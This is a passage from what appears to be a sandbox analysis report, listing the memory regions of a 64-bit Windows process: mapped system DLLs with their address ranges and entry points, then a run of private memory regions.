"\\Windows\\System32\\vsstrace.dll" (normalized: "c:\\windows\\system32\\vsstrace.dll") Region: id = 1327 start_va = 0x7fef5bb0000 end_va = 0x7fef5d5ffff monitored = 0 entry_point = 0x7fef5bb1010 region_type = mapped_file name = "vssapi.dll" filename = "\\Windows\\System32\\vssapi.dll" (normalized: "c:\\windows\\system32\\vssapi.dll") Region: id = 1328 start_va = 0x7fef6a50000 end_va = 0x7fef6ac3fff monitored = 0 entry_point = 0x7fef6a566f0 region_type = mapped_file name = "netprofm.dll" filename = "\\Windows\\System32\\netprofm.dll" (normalized: "c:\\windows\\system32\\netprofm.dll") Region: id = 1329 start_va = 0x7fef7f60000 end_va = 0x7fef7f7afff monitored = 0 entry_point = 0x7fef7f61198 region_type = mapped_file name = "cabinet.dll" filename = "\\Windows\\System32\\cabinet.dll" (normalized: "c:\\windows\\system32\\cabinet.dll") Region: id = 1330 start_va = 0x7fef8080000 end_va = 0x7fef8088fff monitored = 0 entry_point = 0x7fef80811a0 region_type = mapped_file name = "tschannel.dll" filename = "\\Windows\\System32\\TSChannel.dll" (normalized: "c:\\windows\\system32\\tschannel.dll") Region: id = 1331 start_va = 0x7fef8300000 end_va = 0x7fef83d1fff monitored = 0 entry_point = 0x7fef8391a10 region_type = mapped_file name = "qmgr.dll" filename = "\\Windows\\System32\\qmgr.dll" (normalized: "c:\\windows\\system32\\qmgr.dll") Region: id = 1332 start_va = 0x7fef89f0000 end_va = 0x7fef8a6bfff monitored = 0 entry_point = 0x7fef89f11d4 region_type = mapped_file name = "wer.dll" filename = "\\Windows\\System32\\wer.dll" (normalized: "c:\\windows\\system32\\wer.dll") Region: id = 1333 start_va = 0x7fef8d20000 end_va = 0x7fef8d96fff monitored = 0 entry_point = 0x7fef8d2afd0 region_type = mapped_file name = "taskcomp.dll" filename = "\\Windows\\System32\\taskcomp.dll" (normalized: "c:\\windows\\system32\\taskcomp.dll") Region: id = 1334 start_va = 0x7fef8df0000 end_va = 0x7fef8eddfff monitored = 0 entry_point = 0x7fef8df12a0 region_type = mapped_file name = "actxprxy.dll" filename = "\\Windows\\System32\\actxprxy.dll" (normalized: "c:\\windows\\system32\\actxprxy.dll") Region: id = 1335 start_va = 0x7fef8ee0000 end_va = 0x7fef8ee9fff monitored = 0 entry_point = 0x7fef8ee260c region_type = mapped_file name = "ktmw32.dll" filename = "\\Windows\\System32\\ktmw32.dll" (normalized: "c:\\windows\\system32\\ktmw32.dll") Region: id = 1336 start_va = 0x7fef8ef0000 end_va = 0x7fef9001fff monitored = 0 entry_point = 0x7fef8f0f354 region_type = mapped_file name = "schedsvc.dll" filename = "\\Windows\\System32\\schedsvc.dll" (normalized: "c:\\windows\\system32\\schedsvc.dll") Region: id = 1337 start_va = 0x7fef9010000 end_va = 0x7fef901efff monitored = 0 entry_point = 0x7fef9017e80 region_type = mapped_file name = "wiarpc.dll" filename = "\\Windows\\System32\\wiarpc.dll" (normalized: "c:\\windows\\system32\\wiarpc.dll") Region: id = 1338 start_va = 0x7fef9020000 end_va = 0x7fef9028fff monitored = 0 entry_point = 0x7fef9023668 region_type = mapped_file name = "fvecerts.dll" filename = "\\Windows\\System32\\fvecerts.dll" (normalized: "c:\\windows\\system32\\fvecerts.dll") Region: id = 1339 start_va = 0x7fef9030000 end_va = 0x7fef9038fff monitored = 0 entry_point = 0x7fef9031020 region_type = mapped_file name = "tbs.dll" filename = "\\Windows\\System32\\tbs.dll" (normalized: "c:\\windows\\system32\\tbs.dll") Region: id = 1340 start_va = 0x7fef9040000 end_va = 0x7fef9095fff monitored = 0 entry_point = 0x7fef9041040 region_type = mapped_file name = "fveapi.dll" filename = "\\Windows\\System32\\fveapi.dll" (normalized: "c:\\windows\\system32\\fveapi.dll") Region: id = 1341 start_va = 0x7fef90a0000 end_va = 0x7fef90fdfff monitored = 0 entry_point = 0x7fef90a9024 region_type = mapped_file name = "shsvcs.dll" filename = "\\Windows\\System32\\shsvcs.dll" (normalized: "c:\\windows\\system32\\shsvcs.dll") Region: id = 1342 start_va = 0x7fef9100000 end_va = 0x7fef9117fff monitored = 0 entry_point = 0x7fef9101bf8 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll") Region: id = 1343 start_va = 0x7fef9120000 end_va = 0x7fef9130fff monitored = 0 entry_point = 0x7fef91216ac region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll") Region: id = 1344 start_va = 0x7fef9150000 end_va = 0x7fef91a2fff monitored = 0 entry_point = 0x7fef9152b98 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 1345 start_va = 0x7fef96f0000 end_va = 0x7fef9706fff monitored = 0 entry_point = 0x7fef96f9d50 region_type = mapped_file name = "ncprov.dll" filename = "\\Windows\\System32\\wbem\\NCProv.dll" (normalized: "c:\\windows\\system32\\wbem\\ncprov.dll") Region: id = 1346 start_va = 0x7fef98b0000 end_va = 0x7fef98f1fff monitored = 0 entry_point = 0x7fef98e0048 region_type = mapped_file name = "tcpipcfg.dll" filename = "\\Windows\\System32\\tcpipcfg.dll" (normalized: "c:\\windows\\system32\\tcpipcfg.dll") Region: id = 1347 start_va = 0x7fef9900000 end_va = 0x7fef9919fff monitored = 0 entry_point = 0x7fef9911ae4 region_type = mapped_file name = "rascfg.dll" filename = "\\Windows\\System32\\rascfg.dll" (normalized: "c:\\windows\\system32\\rascfg.dll") Region: id = 1348 start_va = 0x7fef9940000 end_va = 0x7fef994efff monitored = 0 entry_point = 0x7fef9946894 region_type = mapped_file name = "ndiscapcfg.dll" filename = "\\Windows\\System32\\ndiscapCfg.dll" (normalized: "c:\\windows\\system32\\ndiscapcfg.dll") Region: id = 1349 start_va = 0x7fefb210000 end_va = 0x7fefb223fff monitored = 0 entry_point = 0x7fefb213e64 region_type = mapped_file name = "sens.dll" filename = "\\Windows\\System32\\Sens.dll" (normalized: "c:\\windows\\system32\\sens.dll") Region: id = 1350 start_va = 0x7fefb230000 end_va = 0x7fefb23afff monitored = 0 entry_point = 0x7fefb231198 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 1351 start_va = 0x7fefb240000 end_va = 0x7fefb266fff monitored = 0 entry_point = 0x7fefb2498bc region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 1352 start_va = 0x7fefb270000 end_va = 0x7fefb2d6fff monitored = 0 entry_point = 0x7fefb286060 region_type = mapped_file name = "es.dll" filename = "\\Windows\\System32\\es.dll" (normalized: "c:\\windows\\system32\\es.dll") Region: id = 1353 start_va = 0x7fefb2f0000 end_va = 0x7fefb2fafff monitored = 0 entry_point = 0x7fefb2f4f8c region_type = mapped_file name = "slc.dll" filename = "\\Windows\\System32\\slc.dll" (normalized: "c:\\windows\\system32\\slc.dll") Region: id = 1354 start_va = 0x7fefb300000 end_va = 0x7fefb30bfff monitored = 0 entry_point = 0x7fefb3015d8 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 1355 start_va = 0x7fefb310000 end_va = 0x7fefb31ffff monitored = 0 entry_point = 0x7fefb31835c region_type = mapped_file name = "themeservice.dll" filename = "\\Windows\\System32\\themeservice.dll" (normalized: "c:\\windows\\system32\\themeservice.dll") Region: id = 1356 start_va = 0x7fefb320000 end_va = 0x7fefb338fff monitored = 0 entry_point = 0x7fefb3211a8 region_type = mapped_file name = "atl.dll" filename = "\\Windows\\System32\\atl.dll" (normalized: "c:\\windows\\system32\\atl.dll") Region: id = 1357 start_va = 0x7fefb340000 end_va = 0x7fefb376fff monitored = 0 entry_point = 0x7fefb348424 region_type = mapped_file name = "profsvc.dll" filename = "\\Windows\\System32\\profsvc.dll" (normalized: "c:\\windows\\system32\\profsvc.dll") Region: id = 1358 start_va = 0x7fefb3c0000 end_va = 0x7fefb3d4fff monitored = 0 entry_point = 0x7fefb3c60d8 region_type = mapped_file name = "nlaapi.dll" filename = "\\Windows\\System32\\nlaapi.dll" (normalized: "c:\\windows\\system32\\nlaapi.dll") Region: id = 1359 start_va = 0x7fefb3e0000 end_va = 0x7fefb4a1fff monitored = 0 entry_point = 0x7fefb3e101c region_type = mapped_file name = "gpsvc.dll" filename = "\\Windows\\System32\\gpsvc.dll" (normalized: "c:\\windows\\system32\\gpsvc.dll") Region: id = 1360 start_va = 0x7fefb6e0000 end_va = 0x7fefb6e8fff monitored = 0 entry_point = 0x7fefb6e1010 region_type = mapped_file name = "avrt.dll" filename = "\\Windows\\System32\\avrt.dll" (normalized: "c:\\windows\\system32\\avrt.dll") Region: id = 1361 start_va = 0x7fefb920000 end_va = 0x7fefb933fff monitored = 0 entry_point = 0x7fefb9216b4 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 1362 start_va = 0x7fefb940000 end_va = 0x7fefb954fff monitored = 0 entry_point = 0x7fefb941050 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 1363 start_va = 0x7fefb960000 end_va = 0x7fefb96bfff monitored = 0 entry_point = 0x7fefb9618a4 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 1364 start_va = 0x7fefb970000 end_va = 0x7fefb985fff monitored = 0 entry_point = 0x7fefb9711a0 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 1365 start_va = 0x7fefbaa0000 end_va = 0x7fefbab0fff monitored = 0 entry_point = 0x7fefbaa1070 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 1366 start_va = 0x7fefbc00000 end_va = 0x7fefbc34fff monitored = 0 entry_point = 0x7fefbc01064 region_type = mapped_file name = "xmllite.dll" filename = "\\Windows\\System32\\xmllite.dll" (normalized: "c:\\windows\\system32\\xmllite.dll") Region: id = 1367 start_va = 0x7fefc070000 end_va = 0x7fefc0c5fff monitored = 0 entry_point = 0x7fefc07bbc0 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 1368 start_va = 0x7fefc0d0000 end_va = 0x7fefc1fbfff monitored = 0 entry_point = 0x7fefc0d94bc region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 1369 start_va = 0x7fefc200000 end_va = 0x7fefc21cfff monitored = 0 entry_point = 0x7fefc201ef4 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 1370 start_va = 0x7fefc250000 end_va = 0x7fefc443fff monitored = 0 entry_point = 0x7fefc3dc924 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll") Region: id = 1371 start_va = 0x7fefc740000 end_va = 0x7fefc76cfff monitored = 0 entry_point = 0x7fefc741010 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 1372 start_va = 0x7fefc910000 end_va = 0x7fefc91bfff monitored = 0 entry_point = 0x7fefc911064 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 1373 start_va = 0x7fefc920000 end_va = 0x7fefc9dafff monitored = 0 entry_point = 0x7fefc926de0 region_type = mapped_file name = "firewallapi.dll" filename = "\\Windows\\System32\\FirewallAPI.dll" (normalized: "c:\\windows\\system32\\firewallapi.dll") Region: id = 1374 start_va = 0x7fefc9e0000 end_va = 0x7fefc9e6fff monitored = 0 entry_point = 0x7fefc9e14b0 region_type = mapped_file name = "wshtcpip.dll" filename = "\\Windows\\System32\\WSHTCPIP.DLL" (normalized: "c:\\windows\\system32\\wshtcpip.dll") Region: id = 1375 start_va = 0x7fefcad0000 end_va = 0x7fefcaeafff monitored = 0 entry_point = 0x7fefcad2068 region_type = mapped_file name = "gpapi.dll" filename = "\\Windows\\System32\\gpapi.dll" (normalized: "c:\\windows\\system32\\gpapi.dll") Region: id = 1376 start_va = 0x7fefcaf0000 end_va = 0x7fefcb0dfff monitored = 0 entry_point = 0x7fefcaf13b8 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 1377 start_va = 0x7fefcb10000 end_va = 0x7fefcb21fff monitored = 0 entry_point = 0x7fefcb11060 region_type = mapped_file name = "devrtl.dll" filename = "\\Windows\\System32\\devrtl.dll" (normalized: "c:\\windows\\system32\\devrtl.dll") Region: id = 1378 start_va = 0x7fefcb30000 end_va = 0x7fefcb4efff monitored = 0 entry_point = 0x7fefcb35c68 region_type = mapped_file name = "spinf.dll" filename = "\\Windows\\System32\\SPInf.dll" (normalized: "c:\\windows\\system32\\spinf.dll") Region: id = 1379 start_va = 0x7fefcc00000 end_va = 0x7fefcc38fff monitored = 0 entry_point = 0x7fefcc0c0f0 region_type = mapped_file name = "ubpm.dll" filename = "\\Windows\\System32\\ubpm.dll" (normalized: "c:\\windows\\system32\\ubpm.dll") Region: id = 1380 start_va = 0x7fefcc40000 end_va = 0x7fefcc49fff monitored = 0 entry_point = 0x7fefcc43cb8 region_type = mapped_file name = "credssp.dll" filename = "\\Windows\\System32\\credssp.dll" (normalized: "c:\\windows\\system32\\credssp.dll") Region: id = 1381 start_va = 0x7fefcc50000 end_va = 0x7fefcc5cfff monitored = 0 entry_point = 0x7fefcc51348 region_type = mapped_file name = "pcwum.dll" filename = "\\Windows\\System32\\pcwum.dll" (normalized: "c:\\windows\\system32\\pcwum.dll") Region: id = 1382 start_va = 0x7fefcd40000 end_va = 0x7fefcd86fff monitored = 0 entry_point = 0x7fefcd41064 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 1383 start_va = 0x7fefce30000 end_va = 0x7fefce5ffff monitored = 0 entry_point = 0x7fefce3194c region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 1384 start_va = 0x7fefce60000 end_va = 0x7fefcebafff monitored = 0 entry_point = 0x7fefce66940 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 1385 start_va = 0x7fefcfd0000 end_va = 0x7fefcfd6fff monitored = 0 entry_point = 0x7fefcfd142c region_type = mapped_file name = "wship6.dll" filename = "\\Windows\\System32\\wship6.dll" (normalized: "c:\\windows\\system32\\wship6.dll") Region: id = 1386 start_va = 0x7fefcfe0000 end_va = 0x7fefd034fff monitored = 0 entry_point = 0x7fefcfe1054 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 1387 start_va = 0x7fefd040000 end_va = 0x7fefd057fff monitored = 0 entry_point = 0x7fefd043b48 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 1388 start_va = 0x7fefd150000 end_va = 0x7fefd181fff monitored = 0 entry_point = 0x7fefd15144c region_type = mapped_file name = "netjoin.dll" filename = "\\Windows\\System32\\netjoin.dll" (normalized: "c:\\windows\\system32\\netjoin.dll") Region: id = 1389 start_va = 0x7fefd190000 end_va = 0x7fefd1b1fff monitored = 0 entry_point = 0x7fefd195d30 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 1390 start_va = 0x7fefd210000 end_va = 0x7fefd23efff monitored = 0 entry_point = 0x7fefd211064 region_type = mapped_file name = "authz.dll" filename = "\\Windows\\System32\\authz.dll" (normalized: "c:\\windows\\system32\\authz.dll") Region: id = 1391 start_va = 0x7fefd250000 end_va = 0x7fefd2bcfff monitored = 0 entry_point = 0x7fefd251010 region_type = mapped_file name = "wevtapi.dll" filename = "\\Windows\\System32\\wevtapi.dll" (normalized: "c:\\windows\\system32\\wevtapi.dll") Region: id = 1392 start_va = 0x7fefd2c0000 end_va = 0x7fefd2d3fff monitored = 0 entry_point = 0x7fefd2c4160 region_type = mapped_file name = "cryptdll.dll" filename = "\\Windows\\System32\\cryptdll.dll" (normalized: "c:\\windows\\system32\\cryptdll.dll") Region: id = 1393 start_va = 0x7fefd520000 end_va = 0x7fefd527fff monitored = 0 entry_point = 0x7fefd522a6c region_type = mapped_file name = "wmsgapi.dll" filename = "\\Windows\\System32\\wmsgapi.dll" (normalized: "c:\\windows\\system32\\wmsgapi.dll") Region: id = 1394 start_va = 0x7fefd530000 end_va = 0x7fefd539fff monitored = 0 entry_point = 0x7fefd533b40 region_type = mapped_file name = "sysntfy.dll" filename = "\\Windows\\System32\\sysntfy.dll" (normalized: "c:\\windows\\system32\\sysntfy.dll") Region: id = 1395 start_va = 0x7fefd540000 end_va = 0x7fefd562fff monitored = 0 entry_point = 0x7fefd541198 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 1396 start_va = 0x7fefd5e0000 end_va = 0x7fefd5eafff monitored = 0 entry_point = 0x7fefd5e1030 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 1397 start_va = 0x7fefd610000 end_va = 0x7fefd634fff monitored = 0 entry_point = 0x7fefd619658 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 1398 start_va = 0x7fefd640000 end_va = 0x7fefd64efff monitored = 0 entry_point = 0x7fefd641010 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 1399 start_va = 0x7fefd650000 end_va = 0x7fefd6e0fff monitored = 0 entry_point = 0x7fefd651440 region_type = mapped_file name = "sxs.dll" filename = "\\Windows\\System32\\sxs.dll" (normalized: "c:\\windows\\system32\\sxs.dll") Region: id = 1400 start_va = 0x7fefd6f0000 end_va = 0x7fefd72cfff monitored = 0 entry_point = 0x7fefd6f18f4 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 1401 start_va = 0x7fefd730000 end_va = 0x7fefd743fff monitored = 0 entry_point = 0x7fefd7310e0 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 1402 start_va = 0x7fefd750000 end_va = 0x7fefd75efff monitored = 0 entry_point = 0x7fefd7519b0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 1403 start_va = 0x7fefd7f0000 end_va = 0x7fefd7fefff monitored = 0 entry_point = 0x7fefd7f1020 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 1404 start_va = 0x7fefd800000 end_va = 0x7fefd96cfff monitored = 0 entry_point = 0x7fefd8010b4 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 1405 start_va = 0x7fefd970000 end_va = 0x7fefd9dbfff monitored = 0 entry_point = 0x7fefd972780 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1406 start_va = 0x7fefd9e0000 end_va = 0x7fefda1afff monitored = 0 entry_point = 0x7fefd9e1324 region_type = mapped_file name = "wintrust.dll" filename = "\\Windows\\System32\\wintrust.dll" (normalized: "c:\\windows\\system32\\wintrust.dll") Region: id = 1407 start_va = 0x7fefda20000 end_va = 0x7fefda55fff monitored = 0 entry_point = 0x7fefda21474 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 1408 start_va = 0x7fefda60000 end_va = 0x7fefda79fff monitored = 0 entry_point = 0x7fefda61558 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 1409 start_va = 0x7fefdca0000 end_va = 0x7fefdd38fff monitored = 0 entry_point = 0x7fefdca1c10 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 1410 start_va = 0x7fefdd40000 end_va = 0x7fefde6cfff monitored = 0 entry_point = 0x7fefdd8ed50 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 1411 start_va = 0x7fefde70000 end_va = 0x7fefded6fff monitored = 0 entry_point = 0x7fefde7b03c region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 1412 start_va = 0x7fefdee0000 end_va = 0x7fefec67fff monitored = 0 entry_point = 0x7fefdf5cebc region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 1413 start_va = 0x7fefec70000 end_va = 0x7fefed78fff monitored = 0 entry_point = 0x7fefec71064 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 1414 start_va = 0x7fefef30000 end_va = 0x7fefefa0fff monitored = 0 entry_point = 0x7fefef41e20 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 1415 start_va = 0x7fefefb0000 end_va = 0x7feff08afff monitored = 0 entry_point = 0x7fefefd0760 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 1416 start_va = 0x7feff090000 end_va = 0x7feff12efff monitored = 0 entry_point = 0x7feff0925a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1417 start_va = 0x7feff130000 end_va = 0x7feff137fff monitored = 0 entry_point = 0x7feff131504 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 1418 start_va = 0x7feff140000 end_va = 0x7feff15efff monitored = 0 entry_point = 0x7feff1460e8 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 1419 start_va = 0x7feff180000 end_va = 0x7feff1d1fff monitored = 0 entry_point = 0x7feff1810d4 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll") Region: id = 1420 start_va = 0x7feff1e0000 end_va = 0x7feff2b6fff monitored = 0 entry_point = 0x7feff1e3274 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 1421 start_va = 0x7feff2c0000 end_va = 0x7feff2edfff monitored = 0 entry_point = 0x7feff2c1010 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 1422 start_va = 0x7feff2f0000 end_va = 0x7feff4f2fff monitored = 0 entry_point = 0x7feff313330 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 1423 start_va = 0x7feff5a0000 end_va = 0x7feff5adfff monitored = 0 entry_point = 0x7feff5a1080 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 1424 start_va = 0x7feff5b0000 end_va = 0x7feff678fff monitored = 0 entry_point = 0x7feff62a874 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 1425 start_va = 0x7feff680000 end_va = 0x7feff856fff monitored = 0 entry_point = 0x7feff681010 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll") Region: id = 1426 start_va = 0x7feffac0000 end_va = 0x7feffb0cfff monitored = 0 entry_point = 0x7feffac1070 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 1427 start_va = 0x7feffb20000 end_va = 0x7feffb20fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 1428 start_va = 0x7fffff4e000 end_va = 0x7fffff4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff4e000" filename = "" Region: id = 1429 start_va = 0x7fffff50000 end_va = 0x7fffff51fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff50000" filename = "" Region: id = 1430 start_va = 0x7fffff52000 end_va = 0x7fffff53fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff52000" filename = "" Region: id = 1431 start_va = 0x7fffff54000 end_va = 0x7fffff55fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff54000" filename = "" Region: id = 1432 start_va = 0x7fffff56000 end_va = 0x7fffff57fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff56000" filename = "" Region: id = 1433 start_va = 0x7fffff58000 end_va = 0x7fffff59fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff58000" filename = "" Region: id = 1434 start_va = 0x7fffff5a000 end_va = 0x7fffff5bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff5a000" filename = "" Region: id = 1435 start_va = 0x7fffff5c000 end_va = 0x7fffff5dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff5c000" filename = "" Region: id = 1436 start_va = 0x7fffff5e000 end_va = 0x7fffff5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff5e000" filename = "" Region: id = 1437 start_va = 0x7fffff60000 end_va = 0x7fffff61fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff60000" filename = "" Region: id = 1438 start_va = 0x7fffff62000 end_va = 0x7fffff63fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff62000" filename = "" Region: id = 1439 start_va = 0x7fffff64000 end_va = 0x7fffff65fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff64000" filename = "" Region: id = 1440 start_va = 0x7fffff66000 end_va = 0x7fffff67fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff66000" filename = "" Region: id = 1441 start_va = 0x7fffff68000 end_va = 0x7fffff69fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff68000" filename = "" Region: id = 1442 start_va = 0x7fffff6a000 end_va = 0x7fffff6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff6a000" filename = "" Region: id = 1443 start_va = 0x7fffff6c000 end_va = 0x7fffff6dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff6c000" filename = "" Region: id = 1444 start_va = 0x7fffff6e000 end_va = 0x7fffff6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff6e000" filename = "" Region: id = 1445 start_va = 0x7fffff70000 end_va = 0x7fffff71fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff70000" filename = "" Region: id = 1446 start_va = 0x7fffff72000 end_va = 0x7fffff73fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff72000" filename = "" Region: id = 1447 start_va = 0x7fffff78000 end_va = 0x7fffff79fff monitored = 1 entry_point = 0x0 region_type = private name = 